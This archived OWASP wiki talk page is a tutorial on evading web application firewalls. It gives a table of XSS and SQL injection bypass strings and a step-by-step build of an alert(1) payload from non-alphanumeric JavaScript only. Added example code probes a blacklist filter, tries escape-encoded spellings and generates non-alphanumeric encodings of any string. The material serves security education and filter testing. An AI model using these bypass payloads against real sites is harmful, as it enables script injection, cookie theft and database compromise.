This site is the archived OWASP Foundation Wiki and is no longer accepting Account Requests.
User talk:Vaibhav Khatke
Web Application Firewall Bypassing to produce XSS using Non-Alphanumeric characters.
What am I doing here?
I am describing simple confusion ("bewilderment") attacks that bypass security controls such as the output-encoding and input-filtering mechanisms used in multi-tier web applications, intrusion detection systems (IDS), intrusion prevention systems (IPS) and web application firewalls (WAFs). There are several tutorials on WAF bypass already, but I think this one takes a different and useful angle.
At the beginning we compare the distinct HTML parsing and interpretation behaviour of the most common browsers/HTML parsers, because those differences lead to unique attack vectors. JavaScript is another tool that can be used both to obfuscate and to de-obfuscate code: we will create a malicious JavaScript payload that contains no alphanumeric characters at all. SQL injection is still a major flaw in today's web applications, and I will try to demonstrate a WAF bypass for that as well. Abbreviations used: WAF, IPS, IDS, obfuscation, SQL injection, XSS, CSS, CSRF.
Assumption: "obfuscated payload" means the vector or string that will bypass the WAF.
1. Web application vulnerabilities, problems and WAFs
1.1 What is a Web Application Firewall (WAF)?
The OWASP definition [1] says: "A web application firewall (WAF) is an appliance, server plugin, or filter that applies a set of rules to an HTTP conversation. Generally, these rules cover common attacks such as Cross-site Scripting (XSS) and SQL injection. By customizing the rules to your application, many attacks can be identified and blocked. The effort to perform this customization can be significant and needs to be maintained as the application is modified." A WAF is an extension of the IDS/IPS idea designed to monitor HTTP traffic and detect HTTP-level attacks. Its business logic matches requests against attack signatures written in its regular-expression rule language. WAFs commonly also bundle functions such as cookie encryption/decryption and CSRF protection.
1.2 Common WAF implementations
WAFs mostly work in blacklisting mode only, which is why they are comparatively easy to attack and bypass. The term "blacklisting", according to the OWASP definition [5], means "Reject known bad". Adopting this strategy means that you have to maintain the list of "known bad" characters and patterns.
WAF with blacklisting:
OWASP says: "In principle can only search for specific characters or character strings and prevent processing. Essentially there are problems with this approach in the degree of coverage as well as with possible filter evasion attacks (e.g. with multiple coding) if no input normalization is carried out. This works very well with known attacks (e.g. SQL injection), but certainly less well with protocols not known to the WAF or with proprietary protocols. In addition, injection attacks on some types of input data can be effectively prevented using URL encryption and hidden form parameter protection. An example of this is the item number in an online shop, which traditionally would often be used for SQL injection attacks, but it should never actually be possible for users to manipulate these directly."
The much more secure strategy is whitelisting. According to the OWASP definition [6] it means "Accept known good": this strategy is also known as "whitelist" or "positive" validation. The idea is that you check that the data is one of a set of tightly constrained known-good values; any data that does not match is rejected. Data should be:
• strongly typed
• length-checked and minimized
• range-checked
• unsigned by default
• syntax- and grammar-checked
In whitelisting mode every user input and output stream is checked against what the application actually expects, which is why this mode is also described as working on the application context.
Although a blacklisting WAF can be bypassed, it is cheap to install and operate, and it is often the only option for customers who do not control their web application's code and whose supplier does not provide security patches.
1.3 Web application firewall filter rules
A WAF applies a set of rules at the network/application layer to filter inputs and outputs. Some systems additionally rely on security through obscurity as a defence-in-depth measure, while all known vulnerabilities are mitigated by other means.
An attacker's first step is information gathering, so security through obscurity at least delays that step.
Open-source WAFs (ModSecurity, PHPIDS) publish their rule sets. Public scrutiny of those rules has done a lot to make the WAFs more robust.
Some WAF bypasses:
Blocked by WAF | Bypass string
---|---
eval(name) | x=this.name X(0?$:name+1)
alert(vaibs); | hex-encoded alert(vaibs);
1 or 1=1 | (1)or(1)=(1)
<img src=x:x onerror=alert(1)//></img> | <img src=http://url onload=alert(1)//></img>
<script type="text/javascript">// <![CDATA[ alert(/Welcome to Xss Waf Tut/) // ]]></script><script>alert(1)</script> | <img src="x:x" onerror="alert(1)"></img>
'or 1=1-- | ' or 9=9--
' or '='r | '/**/OR/**/'='
<script>alert(1)</script> | <script type=vbscript>MsgBox(1)</script>
alert(1) | %00alert(1)
1.4 Web application vulnerabilities
Web applications have increased portability and adaptability and made complex tasks much easier to perform. With all that convenience come critical vulnerabilities, often caused by poor programming, for example:
SQL injection, cross-site scripting (client-side injection), local file inclusion, remote file inclusion, CSRF, DDoS.
Increasing complexity increases the number of potential vulnerabilities and threats.
2 Bypassing Web Application Firewalls
I will try my best to demonstrate the bypass process with JavaScript and SQL.
2.1 The bypass flow an attacker follows
Tool used: Live HTTP Headers (browser extension).
1. First find the special characters the WAF does not inspect. Put each candidate character into the vector of any injection technique and check the HTTP response to see whether it passed the firewall; the characters that pass are the building blocks for everything that follows.
2. Create an obfuscated payload and send it to the server as a request. Obfuscation is effective because it can evade a filter whose business logic is poorly written. Obfuscated payloads are usually much longer than the original, so they only work if the allowed GET/POST data size is large enough.
3. Execute the plan above and inspect the server's HTTP response. Note which characters or character sequences passed the filter, because they will come in handy later.
4. If the response is negative, i.e. the payload was filtered, try another sequence.
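As an added example (not the page's own code), here is the probe step of the flow above run against a constructed blacklist filter, so that it works offline and is reproducible. The regular-expression rules, the candidate strings and the `normalize` switch are assumptions made for the demonstration, not any real WAF's configuration. It shows the point made in 1.2 about "multiple coding": the same `%`-encoded payload passes a filter that does not normalize its input and is caught by one that does, while the bare non-alphanumeric characters pass both and are the raw material the rest of the tutorial builds on.

```javascript
// Added example, not from the original page: the probe step (2.1) run
// against a constructed blacklist filter so it works offline. The rules,
// candidate strings and the normalize switch are assumptions made for the
// demonstration, not any real WAF's configuration.

// Toy blacklist WAF: "blocked" if any rule matches. With normalize=true the
// input is URL-decoded first (the input normalization section 1.2 mentions).
function makeBlacklistFilter(rules, normalize) {
  return function inspect(input) {
    let s = input;
    if (normalize) {
      try {
        s = decodeURIComponent(s);
      } catch (e) {
        // malformed %xx sequence: inspect the raw input instead of dropping it
      }
    }
    return rules.some((re) => re.test(s)) ? "blocked" : "passed";
  };
}

// Step 1 of the flow: push every candidate through the filter and record
// which ones survive. Against a real target `filter` would be one HTTP
// request per candidate, judged by the response (status code, error page).
function probe(filter, candidates) {
  const result = { passed: [], blocked: [] };
  for (const c of candidates) result[filter(c)].push(c);
  return result;
}

// Constructed rule set in the style of a signature-based WAF.
const RULES = [
  /<script/i,                 // script tag
  /\balert\s*\(/i,            // alert( call
  /\bor\b\s+\d+\s*=\s*\d+/i,  // "1 or 1=1" style tautology
];

// Constructed candidates: single characters first, then whole vectors.
const CANDIDATES = [
  ..."(){}[]+!$_=<>;\"'%",
  "alert(1)",
  "%61lert(1)",      // 'a' URL-encoded
  "<script>",
  "%3Cscript%3E",    // <script> URL-encoded
  "1 or 1=1",
  "(1)or(1)=(1)",    // the table's SQL bypass: no whitespace for \s+ to match
];

// Compare a naive filter with a normalizing one on the same candidates.
function compareNormalization() {
  return {
    naive: probe(makeBlacklistFilter(RULES, false), CANDIDATES),
    normalized: probe(makeBlacklistFilter(RULES, true), CANDIDATES),
  };
}

const report = compareNormalization();
console.log("passed without normalization:", report.naive.passed.join(" "));
console.log("passed with normalization:   ", report.normalized.passed.join(" "));
```

The single characters `(){}[]+!$=` pass both filters, which is exactly the alphabet section 2.3 needs. Note that `(1)or(1)=(1)` passes even the normalizing filter because the rule insists on whitespace around the keyword, the kind of regex weakness the flow is designed to find.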
2.2 Obfuscation in JavaScript
I assume you know the basics of JavaScript, as it is a very powerful, dynamic and common client-side scripting language.
JavaScript payloads (vectors) are used by an attacker to produce XSS that reveals the user's cookie. Many JavaScript constructs come in handy, such as:
eval()
Expression closures (similar to lambda notation), e.g.:
(function() alert(/Vaibs/))()
(function($) $(/Vaibs/))(alert)
Generator expressions and array comprehensions, e.g.:
for ([] in [$=alert]) $(/Vaibs/)
$=[(alert) for ([] in [0])][0], $(/2/)
Iterators (an object that knows how to access items from a collection one at a time while keeping track of its current position within that sequence), e.g.:
Iterator ([$=alert.1.]).next()[2],$(3)
Note that expression closures, array comprehensions and the Iterator object were SpiderMonkey (Firefox) extensions that never became part of standard JavaScript and have since been removed from Firefox, so these particular vectors only run in the older Firefox builds this page was written against.
Special characters:
JavaScript supports many encodings, so you can create encoded payloads from Unicode (multibyte) characters, hexadecimal and octal escapes, or any combination of these, plus Base64 via the atob()/btoa() functions.
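An added example (not from the original page) of the escape-based encodings the paragraph above refers to. The `target` object is a constructed stand-in for `window` so the code runs offline; everything else is standard JavaScript. Its point is that which escape works depends on where it appears: Unicode escapes are legal inside an identifier, so `\u0061lert` is literally the identifier `alert`, while hex and octal escapes are only legal inside string literals and must be combined with bracket access.

```javascript
// Added example, not from the original page: the escape encodings the
// "Special characters" paragraph refers to, checked against a constructed
// target object so it runs offline.

// Constructed stand-in for window: the property we want to reach.
const target = { alert: (x) => "called:" + x };

// Different spellings of `target.alert(1)`; each entry is JavaScript source.
function variants() {
  return {
    plain:           "target.alert(1)",
    unicodeIdent:    "target.\\u0061lert(1)",     // \u0061 = 'a', allowed in identifiers
    codepointIdent:  "target.\\u{61}lert(1)",     // ES2015 code point form
    hexString:       "target[\"\\x61lert\"](1)",  // \x61 only valid inside a string
    octalString:     "target[\"\\141lert\"](1)",  // octal escape, sloppy-mode strings only
    hexIdentInvalid: "target.\\x61lert(1)",       // hex escapes are not allowed in identifiers
  };
}

// Compile and run one spelling; report the value or the error class.
function tryVariant(src) {
  try {
    return { ok: true, value: Function("target", "return " + src)(target) };
  } catch (e) {
    return { ok: false, error: e.constructor.name };
  }
}

// Evaluate every spelling. A filter that only matches the literal text
// "alert" misses the first four working variants.
function evaluateAll() {
  const out = {};
  for (const [name, src] of Object.entries(variants())) out[name] = tryVariant(src);
  return out;
}

for (const [name, res] of Object.entries(evaluateAll())) {
  console.log(name.padEnd(16), res.ok ? "-> " + res.value : "fails: " + res.error);
}
```

The octal form is worth remembering as an edge case: it is rejected in strict-mode code, so it only helps when the injection lands in a sloppy-mode context.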
2.3 JavaScript payloads with non-alphanumeric characters
Sometimes the WAF filters the letters and digits out of the payload. The attacker then has to think of a way to inject using non-alphanumeric characters only.
From the server's responses we learn which characters pass, and from those we can build a fully functional obfuscated payload that works.
Example: suppose the characters that passed are (){}_=[];$"!+<>
What JavaScript lets us do with these:
Use string/array indexing to obtain a character the WAF blocks. Say I want alert as the payload; first I need 'a'. Taking 'a' out of the string 'rat' is written 'rat'[1], so 'a' = 'rat'[1]. The trick is to obtain such a source string without typing any letters.
The arithmetic operators are available: addition (+), subtraction (-), multiplication (*), division (/), modulus (%), increment (++) and decrement (--). Use them for numeric conversion, and use the string operator (+ with a string operand) for string conversion.
JavaScript's built-in objects and the strings its type coercion produces (its "error states") are what make the alphanumeric conversion possible, like the following.
Hard-code these into your memory:
Non-alphanumeric expression | JavaScript object / coercion result
---|---
[![]]+[] | "false"
+[][+[]] | NaN (append +[] to get the string "NaN")
[]+{} | "[object Object]"
[][+[]]+[] | "undefined"
[!![]]+[] | "true"
Numbers can be generated without digits as well: the unary + and - operators coerce their operand to a number, so an empty string or an empty array becomes zero.
Like:
+'' = 0
+"" = 0
-[] = -0 (equal to 0)
+[] = 0
Using the same automatic conversion we can generate the other numbers: the ++ operator applied to an array element that holds [] coerces it to 0 and then increments it, and each further wrapping adds one.
Like:
+[] = 0
++[[]][+[]] = 1
++[++[[]][+[]]][+[]] = 2
See JavaScript's numeric conversion rules (ToPrimitive followed by ToNumber) for the details. In the same way we can generate any other number.
2.3.1 Producing 'alert' without using numbers or letters
To generate 'a' we use the value NaN, which means "Not a Number": indexing an empty array at index 0 gives undefined, and converting undefined to a number gives NaN.
Hard-code this into your memory: +[][+[]] = NaN, and +[][+[]]+[] is the string "NaN".
Index 1 of the string "NaN" is 'a', i.e. "NaN"[1] = 'a'.
Now both parts have to be written with special characters only. We know that
++[[]][+[]] = 1
+[][+[]]+[] = "NaN"
so "NaN"[1] = (+[][+[]]+[])[++[[]][+[]]] = 'a'. Substituting the expressions above yields 'a'.
Generating 'l' is just as simple: use the "false" coercion result and take index 2 of "false".
We know that
[![]]+[] = "false"
++[++[[]][+[]]][+[]] = 2
"false"[2] = ([![]]+[])[++[++[[]][+[]]][+[]]] = 'l'
Now 'e' comes from "true" in the same way.
We know that
[!![]]+[] = "true"
++[++[++[[]][+[]]][+[]]][+[]] = 3
"true"[3] = ([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]] = 'e'
'r' and 't' are also in "true" and are generated the same way.
We know that [!![]]+[] = "true"
+[] = 0
++[[]][+[]] = 1
"true"[1] = ([!![]]+[])[++[[]][+[]]] = 'r'
"true"[0] = ([!![]]+[])[+[]] = 't'
So the string 'alert', written without any alphanumeric characters, is:
(+[][+[]]+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+[]]][+[]]]+([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]]
2.3.2 Executing code of your choice
We can force execution of our own code through properties of the window object, calling constructors and methods of the built-in classes to execute arbitrary code. I will keep the demonstration as simple as possible.
alert((1,[].sort)()) shows us the window object.
Older JavaScript engines leaked the window object here: the comma expression drops the array as receiver, so sort is called detached from its object, the reference to the array is lost and the method runs with the global object as this, which it then returns. Access to the object is thereby global rather than limited to the class, and we use that leak to reach alert. Current engines throw a TypeError for this call instead, so this exact step only works in those older browsers.
Now we generate (1,[].sort)(), which yields window, in non-alphanumeric form.
We already know the non-alphanumeric value of alert.
Getting the same for "sort" works the same way:
's' is in "false" at index 3: ([![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]] = 's'
'o' is in "[object Object]" (the state listed above) at index 1: ([]+{})[++[[]][+[]]] = 'o'
'r' and 't' we already know.
So 'sort' = ([![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([]+{})[++[[]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]]
With the window object in hand we only need to call its alert function, which in plain JavaScript is:
(1,[].sort)().alert(1)
The obfuscated form is:
([],[][([![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([]+{})[++[[]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]]])()[(+[][+[]]+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+[]]][+[]]]+([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]]](++[[]][+[]])
which shows alert(1).
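The hand derivation in 2.3.1 and 2.3.2, as an added example (not the page's own code) that generalises it: a small generator that turns any string reachable from the five coercion "states" into a non-alphanumeric expression, using exactly the page's number construction and atom choices, and that evaluates its own output to prove it. It also carries two checks a practitioner wants before reusing the payload above: whether `(1,[].sort)()` still leaks the global object in the engine at hand (it does not in current ones), and that the Function constructor, which the page names as the route to arbitrary code, is reachable with the same alphabet as `[]["sort"]["constructor"]`. The atom order and the helper names are assumptions of this example.

```javascript
// Added example, not from the original page: a generator for the
// non-alphanumeric JavaScript construction of sections 2.3.x. Every string
// it emits contains no letters or digits; numbers and atoms are built
// exactly as the page derives them by hand.

// Atoms: the type-coercion "error states" that yield known strings.
// Order matters: the first atom containing a character wins, and this
// order reproduces the page's choices (a from "NaN", e from "true", ...).
const ATOMS = [
  "+[][+[]]+[]",   // undefined -> number -> string: "NaN"
  "[!![]]+[]",     // "true"
  "[![]]+[]",      // "false"
  "[][+[]]+[]",    // "undefined"
  "[]+{}",         // "[object Object]"
];

// Evaluate an expression in the global (sloppy) scope.
function run(expr) {
  return Function("return " + expr)();
}

// Integer n as a non-alphanumeric expression:
//   0 -> +[]   1 -> ++[[]][+[]]   2 -> ++[++[[]][+[]]][+[]]   ...
function number(n) {
  if (n === 0) return "+[]";
  let expr = "++[[]][+[]]";
  for (let i = 1; i < n; i++) expr = "++[" + expr + "][+[]]";
  return expr;
}

// A single character, taken from the first atom string that contains it.
function char(c) {
  for (const atom of ATOMS) {
    const i = run(atom).indexOf(c);
    if (i !== -1) return "(" + atom + ")[" + number(i) + "]";
  }
  throw new Error("character not reachable from atoms: " + JSON.stringify(c));
}

// A whole string: concatenation of its characters with +.
function encode(str) {
  return Array.from(str, char).join("+");
}

// The set of characters the five atoms can produce.
function reachable() {
  return new Set(ATOMS.map(run).join(""));
}

function isNonAlphanumeric(expr) {
  return !/[A-Za-z0-9]/.test(expr);
}

// Section 2.3.2 relies on (1,[].sort)() returning window. Current engines
// throw instead (sort is invoked with an undefined this); report which.
function sortLeaksGlobal() {
  try {
    return (1, [].sort)() === globalThis;
  } catch (e) {
    return false;
  }
}

// Route to code execution with the same alphabet that still works today:
// the Function constructor, reached through an array method.
function functionConstructor() {
  return "[][" + encode("sort") + "][" + encode("constructor") + "]";
}

console.log(encode("alert"));        // the expression derived in 2.3.1
console.log(run(encode("alert")));   // "alert"
console.log("(1,[].sort)() leaks window here:", sortLeaksGlobal());
```

Everything the generator can spell comes from "NaN", "true", "false", "undefined" and "[object Object]", so letters such as h or m are out of reach until further atoms are added; the JSFuck project extends this same idea to the full character set.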